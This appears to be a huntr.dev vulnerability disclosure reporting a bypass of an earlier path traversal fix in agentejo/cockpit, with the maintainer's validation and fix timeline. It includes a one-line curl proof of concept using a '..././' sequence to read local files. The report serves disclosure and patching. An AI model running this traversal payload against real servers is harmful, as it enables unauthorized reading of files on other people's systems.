External Control of File Name or Path in agentejo/cockpit

Valid

Reported on

Sep 9th 2021


✍️ Description

Bypass of previous fix

🕵️‍♂️ Proof of Concept

I see you recently fixed local-file-inclusion bug https://huntr.dev/bounties/a65d700c-1561-46c1-a9c2-cba6ed960f94/.
And the fixed patch is https://github.com/agentejo/cockpit/commit/f1919184998bf9fa7a7db882c98ce1410375e596 .
But it can be bypassed easilly using bellow url

curl --path-as-is http://10.0.2.15:8080/api/public/..././custom?test=win

💥 Impact

local file read

Occurences

We have contacted a member of the agentejo/cockpit team and are waiting to hear back 3 months ago
We have contacted a member of the agentejo/cockpit team and are waiting to hear back 3 months ago
Artur validated this vulnerability 3 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Artur confirmed that a fix has been merged on d1ea9f 3 months ago
Artur has been awarded the fix bounty